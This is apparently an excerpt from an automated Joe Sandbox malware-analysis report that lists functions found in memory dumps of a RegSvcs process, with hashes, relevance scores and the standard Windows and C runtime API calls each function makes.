Instruction Fuzzy Hash: EAD12D30E00205CFDB55DFA9C958BAEBBF2BF84304F14855AE409AB3A5DB71D985CB81

Function 050FF4F0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db15d8039ba02fe5a18086c9f8a12c625515c538710a43acc60c2d7cefdcf9f3
Instruction ID: 7faafbbd72c7baa53a375e5a7ce1f2852b2d9e88e7c95d1858d6ba5274e41c67
Opcode Fuzzy Hash: db15d8039ba02fe5a18086c9f8a12c625515c538710a43acc60c2d7cefdcf9f3
Instruction Fuzzy Hash: 65C19F74E00218CFDB54DFA5D994B9DBBB2BF88300F2084A9D509AB369DB359E85CF50

Function 050FF948 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 818c9da2de5adbca38c10781bfecc9aa42b2b89f920df22bec0e2a301663edbb
Instruction ID: 1a9598da7a672f11af60ceb7c9a6c807c95aad21b1acea135d987b9a8a3f9ce0
Opcode Fuzzy Hash: 818c9da2de5adbca38c10781bfecc9aa42b2b89f920df22bec0e2a301663edbb
Instruction Fuzzy Hash: 8DC19F74E00218CFDB54DFA5D994B9DBBB2BF88300F1084A9D909AB364DB359E85CF50

Function 050FF098 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85aa4297b8e9ae6cb8c161edc91b3d6687d00354a8511bf269e7e208487d2581
Instruction ID: 537a2ec27abb32e469e744a1c48468952da5e8fc51667865d3b32ac57a86965f
Opcode Fuzzy Hash: 85aa4297b8e9ae6cb8c161edc91b3d6687d00354a8511bf269e7e208487d2581
Instruction Fuzzy Hash: 8CC1A174E00218CFDB54DFA5D994B9DBBB2BF88300F2084A9D909AB365DB359E85CF50

Function 064D14BC Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2907466933.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_64d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 839631521981de5c3c480e7bd0c9578f4b3a7b300031b1e94fe54a9f5f49099a
Instruction ID: 46a7e108a7c77235c6ea2801157c24d0ba14f2f4317b9f2799530f982c8c1417
Opcode Fuzzy Hash: 839631521981de5c3c480e7bd0c9578f4b3a7b300031b1e94fe54a9f5f49099a
Instruction Fuzzy Hash: 73A19F32E00209CFCF46DFB5C8645DEB7B2FF85300B15856AE916AB225DB75D946CB80

Function 050F7321 Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35db497c99340ecfc39afc4cc8988d3aa24e76fd4c9f33b94309111df2255c81
Instruction ID: 9aa9c8a175ea84fc05c32ba4833832e033c180dd86b73ed409765a819b26da11
Opcode Fuzzy Hash: 35db497c99340ecfc39afc4cc8988d3aa24e76fd4c9f33b94309111df2255c81
Instruction Fuzzy Hash: 1EA10571D106198EDB14DFA9D844BDDFBB1FF89300F14C6AAE408A7261EB709A84CF41

Function 064D3430 Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2907466933.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_64d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df778db2c2e35f6bb387cb7caa47681062bcb9bb9470b31d8c050c9c77c59612
Instruction ID: 838e47fb2a7a9841c5a002d57471516ae12adf6cf47d9cbf944074844bca02f9
Opcode Fuzzy Hash: df778db2c2e35f6bb387cb7caa47681062bcb9bb9470b31d8c050c9c77c59612
Instruction Fuzzy Hash: 2CC11DB0CA17058AD728CF25E94839A7B71FB853A4FD25B09D1616B2D0EFB414AECF44

Function 00402B90 Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 519d71d31dfe2b71d65c539f7253ce4d0ce1a0c509a5eaaf561cac07154b4855
Instruction ID: 74c1b90a01db230de662c72faab58802bb742d928f34651097fec506a9751401
Opcode Fuzzy Hash: 519d71d31dfe2b71d65c539f7253ce4d0ce1a0c509a5eaaf561cac07154b4855
Instruction Fuzzy Hash: 15717072A9155347E39CCF5CECD17763713DBC5351F49C23ACA025B6EAC938A922C688

Function 004028B0 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56d4400f77c04dc4446d24fbb084ed78fa0beaad766ef6ff58d44a670f1be69a
Instruction ID: e93c334361593eb17f37b37ed9e80cdb2c00b1b1e1af3e0e9a736190e966ddef
Opcode Fuzzy Hash: 56d4400f77c04dc4446d24fbb084ed78fa0beaad766ef6ff58d44a670f1be69a
Instruction Fuzzy Hash: 4A615E3266055747E391DF6DEEC47663762EBC9351F18C630CA008B6A6CB39B92297CC

Function 02931448 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2902088694.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2930000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afc1e826f98ce3d8c672e251440aeb4540248d005768dbc755b90417978e97a4
Instruction ID: 1ac1d4df9d54aed36434fae1f0160afc0d2676ae3bab00e7d98ca68a070fcefb
Opcode Fuzzy Hash: afc1e826f98ce3d8c672e251440aeb4540248d005768dbc755b90417978e97a4
Instruction Fuzzy Hash: A15132B1D056198BE72CCF6B8D446CAFAF3AFC9304F04C1F9990CAA254DB740A858E41

Function 0293E278 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2902088694.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2930000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80f0efcf405fe890676fe4ff0ec5914c3abe8e9abda3303b4185e6a2b851187e
Instruction ID: 12682a1b8eeb1b7a29d504033068df3be15ef62064ec54fb86065a8641c278aa
Opcode Fuzzy Hash: 80f0efcf405fe890676fe4ff0ec5914c3abe8e9abda3303b4185e6a2b851187e
Instruction Fuzzy Hash: E541DDB4D00358DFDB14CFA9D984BAEBBF5AF09304F20902AE855BB250D774A885CF45

Function 00401650 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f84f8abda09efbfc4fc50908dec446613bf2f52d635c093d4d9c5e236f650133
Instruction ID: 39afabd8a370e1aacf823bb5b0eb141e0e266d105c364ee31248ba7b153c19f0
Opcode Fuzzy Hash: f84f8abda09efbfc4fc50908dec446613bf2f52d635c093d4d9c5e236f650133
Instruction Fuzzy Hash: 2851F94400D7E18EC716873A44E0AA7BFD10FAB115F4E9ACDA5E90B2E3C159C288DB77

Function 02931443 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2902088694.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2930000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74cadd913aaf17c981c9e58b9dbdf6881f0875f479c8c16e350086cf18558638
Instruction ID: b8689991e7c5f615bceee57ab046d784643bb13e7e3fec9fdb577111bec7a76f
Opcode Fuzzy Hash: 74cadd913aaf17c981c9e58b9dbdf6881f0875f479c8c16e350086cf18558638
Instruction Fuzzy Hash: B4511671E056558BE72CCF6B9D447CAFAF3AFC9304F04C1F9994CA6264DB700A818E41

Function 00402F20 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5804b07f674ae3d268ec1438c7da71b35f3107e62f64f1f633515dfb68ee091a
Instruction ID: cff114a85fcb8f5deb46d81d22c4208fa3965af46b01a687ebeadebabb5a60ab
Opcode Fuzzy Hash: 5804b07f674ae3d268ec1438c7da71b35f3107e62f64f1f633515dfb68ee091a
Instruction Fuzzy Hash: 9A31D8302052028BE738CE19C954BEBB3B5AFC0349F44883ED986A73C4DABDD945D795

Function 064D5C80 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2907466933.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_64d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30c30811328271a3ac5015c38fa84c6e7b148cc47da4d2a916edba8cb5d48f3f
Instruction ID: a52729dc9215b66c62f463ebece165a4255b2dda01c63d9f01a68fc59b2f9908
Opcode Fuzzy Hash: 30c30811328271a3ac5015c38fa84c6e7b148cc47da4d2a916edba8cb5d48f3f
Instruction Fuzzy Hash: 7441DCB5D01208AFCB14CFA9E984ADEFBF4EB49310F20901AE819BB310D775A946CF54

Function 050FF93B Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a68c302e7e202cd77adaea5b117fdd6a5f34ce61218408672bb8cd0c989da84e
Instruction ID: 9875b958732c0b25d6758ec9b89b51333727743ac2400fee80879de975315c72
Opcode Fuzzy Hash: a68c302e7e202cd77adaea5b117fdd6a5f34ce61218408672bb8cd0c989da84e
Instruction Fuzzy Hash: C64103B0E012488FDB18DFAAD8546EEFBF2AF88300F24D12AC519BB254DB345946CF54

Function 050FF08B Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dac9256f89f1be01acd1a37f2ca4f618037a7505eed12836525be3c787439b9d
Instruction ID: 32b0a3c13e20fd8aa225aad73eead5ffebc9403fad761b200af9af33aa41ad31
Opcode Fuzzy Hash: dac9256f89f1be01acd1a37f2ca4f618037a7505eed12836525be3c787439b9d
Instruction Fuzzy Hash: 2F41E270E012498BDB58DFAAD8546EEFBF2AF88300F24D12AC519BB254DB345946CF54

Function 050FF4E4 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aed271b7eac5003af485f9f477e4598d3582c36ae901d4f3de3d06a38e684ea5
Instruction ID: 473abaf751af26e0185d7a0b45cd4a2eed5114f8c4fa04be83d5eb68e97af376
Opcode Fuzzy Hash: aed271b7eac5003af485f9f477e4598d3582c36ae901d4f3de3d06a38e684ea5
Instruction Fuzzy Hash: 0041F5B0E01208CBDB58DFAAE9546EEFBF2AF88300F20D129D518BB654DB345946CF54

Function 064D2B2C Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2907466933.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_64d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2220d56d4731e434142c5b875486fa669ead28316c8bd27a551827f814e1a875
Instruction ID: 9e4eb9a820971203915b14d047b931dd316c72bc126b521adb9010de8717f3db
Opcode Fuzzy Hash: 2220d56d4731e434142c5b875486fa669ead28316c8bd27a551827f814e1a875
Instruction Fuzzy Hash: A3319AB5D012189FCB14CFA9E584ADEFBF5EB49310F14902AE818BB310D774A945CF98

Function 00402F89 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9961543af999a1320c5b9d9b8c59a9b64f893fc8dbb42675723320a25693eab2
Instruction ID: 40597224e526abc728bb10992f322fa75c91b34d76fbbe6bc80328d1c420bfc2
Opcode Fuzzy Hash: 9961543af999a1320c5b9d9b8c59a9b64f893fc8dbb42675723320a25693eab2
Instruction Fuzzy Hash: F321923170520247EB68C929C9547ABB3A5ABC0389F48853EC986A73C8DAB9E941D785

Function 00417081 Relevance: 31.8, APIs: 21, Instructions: 340COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,026518C8), ref: 004170C5
MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
_malloc.LIBCMT ref: 0041718A
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
_malloc.LIBCMT ref: 0041724C
LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
__freea.LIBCMT ref: 004172A4
__freea.LIBCMT ref: 004172AD
___ansicp.LIBCMT ref: 004172DE
___convertcp.LIBCMT ref: 00417309
LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
_malloc.LIBCMT ref: 00417362
_memset.LIBCMT ref: 00417384
LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
___convertcp.LIBCMT ref: 004173BA
__freea.LIBCMT ref: 004173CF
LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9

Memory Dump Source

Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
String ID:
API String ID: 3809854901-0
Opcode ID: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
Opcode Fuzzy Hash: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98

Function 004057B0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 205COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 004057DE

Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4

_malloc.LIBCMT ref: 00405842
_malloc.LIBCMT ref: 00405906
_malloc.LIBCMT ref: 00405930

Strings

1.2.3, xrefs: 004058EC, 00405937

Memory Dump Source

Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: _malloc$AllocateHeap
String ID: 1.2.3
API String ID: 680241177-2310465506
Opcode ID: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
Opcode Fuzzy Hash: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A

Function 0040BCC2 Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040BD24
_memcpy_s.LIBCMT ref: 0040BD99
__fileno.LIBCMT ref: 0040BDF9
__read.LIBCMT ref: 0040BE00
__filbuf.LIBCMT ref: 0040BE24
_memset.LIBCMT ref: 0040BE6A
_memset.LIBCMT ref: 0040BE95

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Memory Dump Source

Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
String ID:
API String ID: 3886058894-0
Opcode ID: bd76f0579c09bb0a6f952e3feb4c94488d7cfab1bd6474dd60967b9cc6db7677
Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
Opcode Fuzzy Hash: bd76f0579c09bb0a6f952e3feb4c94488d7cfab1bd6474dd60967b9cc6db7677
Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD

Function 00414738 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00414744

Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745

__getptd.LIBCMT ref: 0041475B
__amsg_exit.LIBCMT ref: 00414769
__lock.LIBCMT ref: 00414779

Strings

@.B, xrefs: 00414786

Memory Dump Source

Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID: @.B
API String ID: 3521780317-470711618
Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D

Function 0040C73D Relevance: 7.6, APIs: 5, Instructions: 64COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 0040C6C8
__fileno.LIBCMT ref: 0040C6D6
__fileno.LIBCMT ref: 0040C6E2
__fileno.LIBCMT ref: 0040C6EE
__fileno.LIBCMT ref: 0040C6FE

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
String ID:
API String ID: 2805327698-0
Opcode ID: 0562b983a982954f07d72bd2f01eb344b0d1ff129a9d588568d63b7b4b77f5f9
Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
Opcode Fuzzy Hash: 0562b983a982954f07d72bd2f01eb344b0d1ff129a9d588568d63b7b4b77f5f9
Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D

Function 00413FCC Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00413FD8

Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745

__amsg_exit.LIBCMT ref: 00413FF8
__lock.LIBCMT ref: 00414008
InterlockedDecrement.KERNEL32(?), ref: 00414025
InterlockedIncrement.KERNEL32(02651660), ref: 00414050

Memory Dump Source

Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD

Function 00413610 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625

Strings

KERNEL32, xrefs: 00413610
IsProcessorFeaturePresent, xrefs: 0041361F

Memory Dump Source

Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A

Function 0040C748 Relevance: 6.1, APIs: 4, Instructions: 148COMMONLIBRARYCODE

Download Yara Rule

APIs

__fileno.LIBCMT ref: 0040C77C
__locking.LIBCMT ref: 0040C791

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: __decode_pointer__fileno__getptd_noexit__locking
String ID:
API String ID: 2395185920-0
Opcode ID: 0afeae9b27a86c2abe0b3397de8921379debd9150d07dd18b85413c6fc1de43d
Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
Opcode Fuzzy Hash: 0afeae9b27a86c2abe0b3397de8921379debd9150d07dd18b85413c6fc1de43d
Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D

